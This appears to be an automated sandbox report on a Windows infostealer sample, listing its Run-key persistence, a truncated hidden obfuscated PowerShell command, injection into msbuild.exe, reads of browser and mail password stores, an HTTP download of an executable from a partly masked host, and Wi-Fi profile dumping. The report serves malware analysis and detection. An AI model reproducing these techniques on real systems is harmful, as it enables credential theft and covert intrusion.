Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'newapp' = '%APPDATA%\newapp\newapp.exe'
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function v239f8 {param($sdaa3f2)$aae745='z73e9d5';$n662f7f='';for ($i=0; $i -lt $sdaa3f2.length;$i+=2){$nc3d8d5=[convert]::ToByte($sdaa3f2.Substring($i,2),16);$n662f7f+=[c...
Injects code into
the following system processes:
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
Reads files which store third party applications passwords
- %APPDATA%\opera software\opera stable\login data
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\thunderbird\profiles.ini
- %APPDATA%\mozilla\firefox\profiles.ini
Modifies file system
Creates the following files
- %TEMP%\25ewnoum.0.cs
- %TEMP%\chjcilsg.dll
- %TEMP%\kgbvwvwk.0.cs
- %TEMP%\kgbvwvwk.cmdline
- %TEMP%\kgbvwvwk.out
- %TEMP%\cscaa0d.tmp
- %TEMP%\resaa1e.tmp
- %TEMP%\kgbvwvwk.dll
- %TEMP%\l6roug4o.0.cs
- %TEMP%\l6roug4o.cmdline
- %TEMP%\l6roug4o.out
- %TEMP%\csccd16.tmp
- %TEMP%\l6roug4o.dll
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %TEMP%\nsvxy-ev.0.cs
- %TEMP%\nsvxy-ev.cmdline
- %TEMP%\nsvxy-ev.out
- %TEMP%\cscf34b.tmp
- %TEMP%\resf35c.tmp
- %TEMP%\nsvxy-ev.dll
- %APPDATA%\oe928.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{e9ea0e3d-4312-48cf-91ba-468aad63d11b}.tmp
- %APPDATA%\newapp\newapp.exe
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %TEMP%\res9175.tmp
- %TEMP%\rescd26.tmp
- %TEMP%\csc9155.tmp
- %TEMP%\res3d1b.tmp
- %TEMP%\25ewnoum.cmdline
- %TEMP%\25ewnoum.out
- %TEMP%\pfjgja38.0.cs
- %TEMP%\pfjgja38.cmdline
- %TEMP%\pfjgja38.out
- %TEMP%\csc3980.tmp
- %TEMP%\csc3d1a.tmp
- %TEMP%\res3991.tmp
- %TEMP%\y58ko2sa.0.cs
- %TEMP%\y58ko2sa.cmdline
- %TEMP%\y58ko2sa.out
- %TEMP%\csc52c5.tmp
- %TEMP%\chjcilsg.cmdline
- %TEMP%\pfjgja38.dll
- %TEMP%\25ewnoum.dll
- %TEMP%\res52d6.tmp
- %TEMP%\y58ko2sa.dll
- %TEMP%\xu8gugpl.0.cs
- %TEMP%\xu8gugpl.cmdline
- %TEMP%\xu8gugpl.out
- %TEMP%\csc73ca.tmp
- %TEMP%\res73eb.tmp
- %TEMP%\xu8gugpl.dll
- %TEMP%\chjcilsg.0.cs
- %TEMP%\chjcilsg.out
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
Sets the 'hidden' attribute to the following files
- %APPDATA%\newapp\newapp.exe
Deletes the following files
- %TEMP%\res3991.tmp
- %TEMP%\chjcilsg.out
- %TEMP%\chjcilsg.pdb
- %TEMP%\chjcilsg.0.cs
- %TEMP%\chjcilsg.dll
- %TEMP%\resaa1e.tmp
- %TEMP%\cscaa0d.tmp
- %TEMP%\kgbvwvwk.dll
- %TEMP%\kgbvwvwk.0.cs
- %TEMP%\kgbvwvwk.cmdline
- %TEMP%\kgbvwvwk.pdb
- %TEMP%\csc9155.tmp
- %TEMP%\chjcilsg.cmdline
- %TEMP%\kgbvwvwk.out
- %TEMP%\l6roug4o.0.cs
- %TEMP%\l6roug4o.cmdline
- %TEMP%\l6roug4o.dll
- %TEMP%\l6roug4o.pdb
- %TEMP%\l6roug4o.out
- %TEMP%\resf35c.tmp
- %TEMP%\cscf34b.tmp
- %TEMP%\nsvxy-ev.0.cs
- %TEMP%\nsvxy-ev.pdb
- %TEMP%\nsvxy-ev.dll
- %TEMP%\rescd26.tmp
- %TEMP%\csccd16.tmp
- %TEMP%\res9175.tmp
- %TEMP%\xu8gugpl.out
- %TEMP%\xu8gugpl.pdb
- %TEMP%\res3d1b.tmp
- %TEMP%\csc3d1a.tmp
- %TEMP%\res52d6.tmp
- %TEMP%\csc52c5.tmp
- %TEMP%\pfjgja38.0.cs
- %TEMP%\pfjgja38.out
- %TEMP%\pfjgja38.pdb
- %TEMP%\pfjgja38.cmdline
- %TEMP%\pfjgja38.dll
- %TEMP%\y58ko2sa.dll
- %TEMP%\y58ko2sa.pdb
- %TEMP%\csc3980.tmp
- %TEMP%\y58ko2sa.out
- %TEMP%\y58ko2sa.0.cs
- %TEMP%\25ewnoum.out
- %TEMP%\25ewnoum.dll
- %TEMP%\25ewnoum.0.cs
- %TEMP%\25ewnoum.pdb
- %TEMP%\25ewnoum.cmdline
- %TEMP%\res73eb.tmp
- %TEMP%\csc73ca.tmp
- %TEMP%\xu8gugpl.cmdline
- %TEMP%\xu8gugpl.dll
- %TEMP%\xu8gugpl.0.cs
- %TEMP%\y58ko2sa.cmdline
- %TEMP%\nsvxy-ev.out
- %TEMP%\nsvxy-ev.cmdline
Network activity
TCP
HTTP GET requests
- http://wh#####oji-4854.daa.jp/caje/bin.exe
UDP
- DNS ASK wh#####oji-4854.daa.jp
Miscellaneous
Creates and executes the following
- '%APPDATA%\oe928.exe'
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nsvxy-ev.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCD26.tmp" "%TEMP%\CSCCD16.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\l6roug4o.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAA1E.tmp" "%TEMP%\CSCAA0D.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\kgbvwvwk.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9175.tmp" "%TEMP%\CSC9155.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\chjcilsg.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES73EB.tmp" "%TEMP%\CSC73CA.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xu8gugpl.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES52D6.tmp" "%TEMP%\CSC52C5.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\y58ko2sa.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3D1B.tmp" "%TEMP%\CSC3D1A.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3991.tmp" "%TEMP%\CSC3980.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pfjgja38.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\25ewnoum.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF35C.tmp" "%TEMP%\CSCF34B.tmp"' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function v239f8 {param($sdaa3f2)$aae745='z73e9d5';$n662f7f='';for ($i=0; $i -lt $sdaa3f2.length;$i+=2){$nc3d8d5=[convert]::ToByte($sdaa3f2.Substring($i,2),16);$n662f7f+=[c...' (with hidden window)
Executes the following
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF35C.tmp" "%TEMP%\CSCF34B.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nsvxy-ev.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCD26.tmp" "%TEMP%\CSCCD16.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\l6roug4o.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAA1E.tmp" "%TEMP%\CSCAA0D.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\kgbvwvwk.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9175.tmp" "%TEMP%\CSC9155.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\chjcilsg.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES73EB.tmp" "%TEMP%\CSC73CA.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xu8gugpl.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES52D6.tmp" "%TEMP%\CSC52C5.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\y58ko2sa.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3D1B.tmp" "%TEMP%\CSC3D1A.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3991.tmp" "%TEMP%\CSC3980.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pfjgja38.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\25ewnoum.cmdline"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'
- '%WINDIR%\syswow64\netsh.exe' wlan show profile
